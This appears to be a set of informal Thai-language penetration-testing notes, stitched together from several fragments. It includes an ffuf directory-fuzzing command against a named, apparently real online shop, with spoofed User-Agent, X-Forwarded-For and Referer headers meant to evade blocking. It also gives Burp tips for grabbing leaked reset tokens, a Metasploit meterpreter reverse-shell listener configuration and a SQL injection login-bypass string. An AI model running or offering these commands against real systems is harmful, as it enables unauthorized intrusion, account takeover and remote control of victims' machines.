เป็นไฟล์ที่เก็บรายการคำยอดนิยม ที่มักจะถูกใช้เป็นชื่อไฟล์หรือโฟลเดอร์ เช่น admin, config, db, ฯลฯ
-w /usr/share/seclists/Discovery/Web-Content/common.txt

🥷 ปลอมตัวเพื่อหลบการบล็อก:
-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
แกล้งทำเป็นเหมือน browser จริงของผู้ใช้ Windows
(กันไม่ให้เว็บรู้ว่าเป็นบอท)

-H "X-Forwarded-For: 127.0.0.1"
ปลอม IP ต้นทางว่าเป็นของตัวเอง (บางเว็บดูจากตรงนี้)

-H "Referer: https://google.com"
แกล้งบอกว่าเราคลิกมาจาก Google (เหมือนคนจริง ๆ)


ffuf -u https://idblox.shop/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/common.txt \
-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)" \
-H "X-Forwarded-For: 127.0.0.1" \
-H "Referer: https://google.com" \
-c -fl 5556 -mc 200 \
-t 5 -p 0.5

🔥 เทคนิคเสริมที่ใช้ตอนเล่น Burp Mission นี้

เทคนิค	อธิบาย
ดู Response ให้ละเอียด	ไม่ใช่แค่ดัก request ต้อง "อ่าน Response" ที่กลับมาด้วย
ค้นหาคำใน response เช่น token, reset, link	มักจะหลุดมาโดยเว็บไม่ตั้งใจ
อย่าพึ่งกด Forward ทันที	ก๊อป token ก่อน แล้วค่อยส่ง request ไป


use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.2.15
set LPORT 4444
set ExitOnSession false
exploit -j


🔥 Quick Summary (จำง่าย)

เครื่องมือใน Burp	ใช้ทำอะไร
Proxy	ดัก request/แก้ request
Repeater	ยิง request เดิมซ้ำ + แก้ไขได้
Decoder	ถอด/แปลง base64 หรือพวก encode

password=' OR '1'='1